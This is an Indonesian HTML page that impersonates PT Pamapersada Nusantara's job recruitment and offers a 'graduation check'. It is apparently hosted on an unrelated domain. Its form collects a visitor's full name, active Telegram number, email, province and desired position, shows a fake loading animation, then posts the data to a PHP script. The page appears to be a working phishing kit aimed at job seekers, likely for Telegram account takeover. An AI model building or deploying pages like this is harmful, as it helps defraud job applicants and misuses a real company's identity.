<!DOCTYPE html>
<html lang="id">
<head>
    <!-- Favicon -->
    <link rel="icon" type="image/png" sizes="32x32" href="images/logo.jpg">

    <!-- Open Graph Meta Tags -->
    <meta property="og:title" content="PT PAMAPERSADA NUSANTARA">
    <meta property="og:description" content="Lowongan kerja terbaru dan terpercaya. Klik untuk melihat detailnya!">
    <meta property="og:image" content="https://pendaftaranpenerimaan2024.my.id/loker/id/career/PTpamarsada-nusantara/pamapersada/images/job.jpg">
    <meta property="og:url" content="https://yourwebsite.com/">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="PT PAMAPERSADA NUSANTARA">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>PT PAMAPERSADA NUSANTARA</title>

    <!-- Stylesheets -->
    <link rel="stylesheet" href="styles/bootstrap.css">
    <link rel="stylesheet" href="styles/style.css">
    <link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700,800,900|Roboto:300,300i,400,400i,500,500i,700,700i,900,900i&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="fonts/css/fontawesome-all.min.css">

    <!-- Apple Touch Icon -->
    <link rel="apple-touch-icon" sizes="180x180" href="images/icon-192x192.png">

    <!-- Styling Overlay dan Loading -->
    <style>
        /* Overlay styling */
        #overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(255, 255, 255, 0.5); /* Transparansi penuh */
            z-index: 9999;
            display: none;
            justify-content: center;
            align-items: center;
        }

        /* Animasi Lottie */
        #lottie-animation {
            width: 300px;
            height: 300px;
        }
    </style>
</head>

<body class="theme-light" data-highlight="blue2">

<div id="page">
    <div class="page-content">
        <img class="card" width="100%" src="images/pama.jpg" alt="Pama">

        <div class="card card-style">
            <div class="content mb-0">
                <h3 class="font-600">Cek Persyaratan Lulus</h3>
                <p>Silahkan lengkapi form di bawah ini dengan benar.</p>
                
                <!-- Form Input Nomor yang dikirim ke cekdata.php -->
                <form action="data/cekdata.php" method="post" onsubmit="handleSubmit(event)">
                    <div class="input-style has-borders no-icon input-style-always-active mb-4">
                        <input type="text" class="form-control" id="nama" name="nama" placeholder="Nama Lengkap" required>
                        <label for="nama" class="color-highlight font-400 font-13">Nama Lengkap</label>
                        <em>(required)</em>
                    </div>

                    <div class="input-style has-borders no-icon input-style-always-active mb-4">
                        <input type="number" name="nomor" id="nomor" class="form-control" placeholder="+62 1234567890" required>
                        <label for="nomor" class="color-highlight font-400 font-13">Masukkan Nomor Telegram Aktif</label>
                        <em>(required)</em>
                    </div>

                    <div class="input-style has-borders no-icon input-style-always-active mb-4">
                        <input type="email" class="form-control" id="email" name="email" placeholder="Email" required>
                        <label for="email" class="color-highlight font-400 font-13">Email</label>
                        <em>(required)</em>
                    </div>

                    <!-- Opsi Lokasi Lengkap -->
                    <div class="input-style has-borders no-icon input-style-always-active mb-4">
                        <select name="lokasi" id="lokasi" class="form-control" required>
                            <option value="" disabled selected>Pilih Lokasi</option>
                            <option value="Aceh">Aceh</option>
                            <option value="Sumatera Utara">Sumatera Utara</option>
                            <option value="Sumatera Barat">Sumatera Barat</option>
                            <option value="Riau">Riau</option>
                            <option value="Kepulauan Riau">Kepulauan Riau</option>
                            <option value="Jambi">Jambi</option>
                            <option value="Sumatera Selatan">Sumatera Selatan</option>
                            <option value="Bangka Belitung">Bangka Belitung</option>
                            <option value="Bengkulu">Bengkulu</option>
                            <option value="Lampung">Lampung</option>
                            <option value="DKI Jakarta">DKI Jakarta</option>
                            <option value="Jawa Barat">Jawa Barat</option>
                            <option value="Banten">Banten</option>
                            <option value="Jawa Tengah">Jawa Tengah</option>
                            <option value="DI Yogyakarta">DI Yogyakarta</option>
                            <option value="Jawa Timur">Jawa Timur</option>
                            <option value="Bali">Bali</option>
                            <option value="Nusa Tenggara Barat">Nusa Tenggara Barat</option>
                            <option value="Nusa Tenggara Timur">Nusa Tenggara Timur</option>
                            <option value="Kalimantan Barat">Kalimantan Barat</option>
                            <option value="Kalimantan Tengah">Kalimantan Tengah</option>
                            <option value="Kalimantan Selatan">Kalimantan Selatan</option>
                            <option value="Kalimantan Timur">Kalimantan Timur</option>
                            <option value="Kalimantan Utara">Kalimantan Utara</option>
                            <option value="Sulawesi Utara">Sulawesi Utara</option>
                            <option value="Sulawesi Tengah">Sulawesi Tengah</option>
                            <option value="Sulawesi Selatan">Sulawesi Selatan</option>
                            <option value="Sulawesi Tenggara">Sulawesi Tenggara</option>
                            <option value="Sulawesi Barat">Sulawesi Barat</option>
                            <option value="Gorontalo">Gorontalo</option>
                            <option value="Maluku">Maluku</option>
                            <option value="Maluku Utara">Maluku Utara</option>
                            <option value="Papua">Papua</option>
                            <option value="Papua Barat">Papua Barat</option>
                            <option value="Papua Tengah">Papua Tengah</option>
                            <option value="Papua Pegunungan">Papua Pegunungan</option>
                            <option value="Papua Selatan">Papua Selatan</option>
                        </select>
                        <label for="lokasi" class="color-highlight font-400 font-13">Lokasi</label>
                        <em>(required)</em>
                    </div>

                    <!-- Opsi Posisi Pekerjaan -->
                    <div class="input-style has-borders no-icon input-style-always-active mb-4">
                        <select name="posisi" id="posisi" class="form-control" required>
                            <option value="" disabled selected>Pilih Posisi</option>
                            <option value="Operator Alat Berat">Operator Alat Berat</option>
                            <option value="Teknisi">Teknisi</option>
                            <option value="Mechanic (Ahli Mekanik)">Mechanic (Ahli Mekanik)</option>
                            <option value="Elektrik (Ahli Listrik)">Elektrik (Ahli Listrik)</option>
                            <option value="Safety Officer">Safety Officer</option>
                            <option value="Surveyor">Surveyor</option>
                            <option value="Logistik dan Pengadaan">Logistik dan Pengadaan</option>
                            <option value="Sumber Daya Manusia (HR)">Sumber Daya Manusia (HR)</option>
                            <option value="Keuangan dan Akuntansi">Keuangan dan Akuntansi</option>
                            <option value="Manajemen Proyek">Manajemen Proyek</option>
                            <option value="Manajemen Operasional">Manajemen Operasional</option>
                            <option value="Pemasaran dan Penjualan">Pemasaran dan Penjualan</option>
                        </select>
                        <label for="posisi" class="color-highlight font-400 font-13">Posisi</label>
                        <em>(required)</em>
                    </div>

                    <button type="submit" class="btn btn-full btn-m shadow-l rounded-s text-uppercase font-900 bg-blue-dark mb-3 mt-4">
                        CEK KELULUSAN
                    </button>  
                </form>
            </div>
        </div>

        <!-- Custom Footer with Image -->
        <div class="footer mt-3">
            <img src="images/footer.png" alt="Footer Image" style="width:100%; height:auto;">
        </div>
    </div>    
</div>    

<!-- Overlay for loading effect -->
<div id="overlay">
    <div id="lottie-animation"></div> <!-- Div untuk menampilkan animasi Lottie -->
</div>

<!-- Scripts -->
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="scripts/bootstrap.min.js"></script>

<!-- Script untuk Lottie -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/bodymovin/5.7.14/lottie.min.js"></script>

<script>
// Fungsi untuk menampilkan overlay dengan animasi Lottie
function showOverlay() {
    var overlay = document.getElementById('overlay');
    if (overlay && !overlay.hasAttribute('data-loaded')) { // Cek jika animasi belum di-load
        overlay.style.display = 'flex'; // Tampilkan overlay

        // Inisialisasi animasi Lottie
        lottie.loadAnimation({
            container: document.getElementById('lottie-animation'), // ID elemen div tempat animasi
            renderer: 'svg',
            loop: true,
            autoplay: true,
            path: 'overlayplan.json' // Path file JSON animasi yang Anda unduh
        });

        overlay.setAttribute('data-loaded', 'true'); // Tandai bahwa animasi telah diinisialisasi
    }
}

// Fungsi untuk menyembunyikan overlay
function hideOverlay() {
    var overlay = document.getElementById('overlay');
    overlay.style.display = 'none';
}

// Fungsi untuk menyimpan data ke localStorage sebelum dikirim
function simpanDataKeLocalStorage() {
    var nama = document.getElementById('nama').value;
    var nomor = document.getElementById('nomor').value;
    var email = document.getElementById('email').value;
    var lokasi = document.getElementById('lokasi').value;
    var posisi = document.getElementById('posisi').value;

    // Validasi nomor telepon agar dimulai dengan +62
    if (!nomor.startsWith('+62')) {
        nomor = '+62' + nomor.substring(1); // Hapus 0 di depan jika ada dan tambahkan +62
    }

    // Simpan data ke localStorage
    localStorage.setItem('nama', nama);
    localStorage.setItem('nomorTelegram', nomor);
    localStorage.setItem('email', email);
    localStorage.setItem('lokasi', lokasi);
    localStorage.setItem('posisi', posisi);
}

// Fungsi untuk menangani submit form
function handleSubmit(event) {
    event.preventDefault(); // Cegah pengiriman form secara langsung

    simpanDataKeLocalStorage(); // Simpan data ke localStorage
    showOverlay(); // Tampilkan overlay

    // Tunggu 10 detik sebelum submit form
    setTimeout(function() {
        hideOverlay(); // Sembunyikan overlay
        event.target.submit(); // Lanjutkan submit form
    }, 5000); // Durasi 10 detik
}
</script>

</body>
</html>
